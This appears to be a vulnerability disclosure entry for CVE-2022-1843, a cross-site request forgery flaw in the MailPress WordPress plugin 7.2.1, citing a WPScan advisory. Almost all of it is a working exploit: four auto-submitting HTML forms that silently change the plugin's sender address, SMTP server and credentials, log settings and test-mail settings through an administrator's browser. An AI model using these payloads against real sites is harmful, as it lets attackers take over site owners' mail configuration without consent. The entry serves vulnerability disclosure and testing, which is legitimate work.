CVE: CVE-2022-1843

Name: MailPress (mailpress)

Version: 7.2.1

Date: 2022-04-23 17:09:19

Advisory: https://wpscan.com/vulnerability/aa59f811-2375-4593-93d4-f587f9870ed1

Type: CSRF

Exploit: 


<form action="https://example.com/wp-admin/options-general.php?page=mailpress_settings&tab=0" method="POST">
    <input type="text" name="_tab" value="general">
    <input type="text" name="general[fromemail]" value="hacked@example.com">
    <input type="text" name="general[fromname]" value="hacked">
    <input type="text" name="general[subscription_mngt]" value="ajax">
    <input type="text" name="general[id]" value="">
    <input type="text" name="general[map_provider]" value="o">
    <input type="text" name="general[bmapkey]" value="">
    <input type="text" name="general[gmapkey]" value="">
    <input type="text" name="general[here_id]" value="">
    <input type="text" name="general[here_code]" value="">
    <input type="text" name="general[mapboxtoken]" value="">
    <input type="text" name="Submit" value="Änderungen speichern">
</form>
<script>
    document.forms[0].submit();
</script>


<form action="https://example.com/wp-admin/options-general.php?page=mailpress_settings&tab=0" method="POST">
    <input type="text" name="_tab" value="connection_smtp">
    <input type="text" name="connection_smtp[server]" value="hacked">
    <input type="text" name="connection_smtp[username]" value="hacked">
    <input type="text" name="connection_smtp[password]" value="hacked">
    <input type="text" name="connection_smtp[ssl]" value="">
    <input type="text" name="connection_smtp[port]" value="25">
    <input type="text" name="connection_smtp[customport]" value="">
    <input type="text" name="connection_smtp[pophost]" value="">
    <input type="text" name="connection_smtp[popport]" value="">
    <input type="text" name="Submit" value="Änderungen speichern">
</form>
<script>
    document.forms[0].submit();
</script>


<form action="https://example.com/wp-admin/options-general.php?page=mailpress_settings&tab=0" method="POST">
    <input type="text" name="_tab" value="logs">
    <input type="text" name="logs[general][level]" value="123456789">
    <input type="text" name="logs[general][lognbr]" value="1">
    <input type="text" name="logs[general][lastpurge]" value="20220423">
    <input type="text" name="Submit" value="Änderungen speichern">
</form>
<script>
    document.forms[0].submit();
</script>


<form action="https://example.com/wp-admin/options-general.php?page=mailpress_settings&tab=0" method="POST">
    <input type="text" name="_tab" value="test">
    <input type="text" name="test[toemail]" value="hacked@example.com">
    <input type="text" name="test[toname]" value="hacked">
    <input type="text" name="test[theme]" value="twentyten">
    <input type="text" name="test[th][MailPress][tm]" value="0">
    <input type="text" name="test[th][MailPress2020][tm]" value="0">
    <input type="text" name="test[th][nogent94][tm]" value="0">
    <input type="text" name="test[th][nohtml][tm]" value="0">
    <input type="text" name="test[th][twentyeleven][tm]" value="0">
    <input type="text" name="test[th][twentyten][tm]" value="0">
    <input type="text" name="test[th][twentythirteen][tm]" value="0">
    <input type="text" name="test[th][twentytwelve][tm]" value="0">
    <input type="text" name="test[fakeit]" value="on">
    <input type="text" name="Test" value="Save & Test">
</form>
<script>
    document.forms[0].submit();
</script>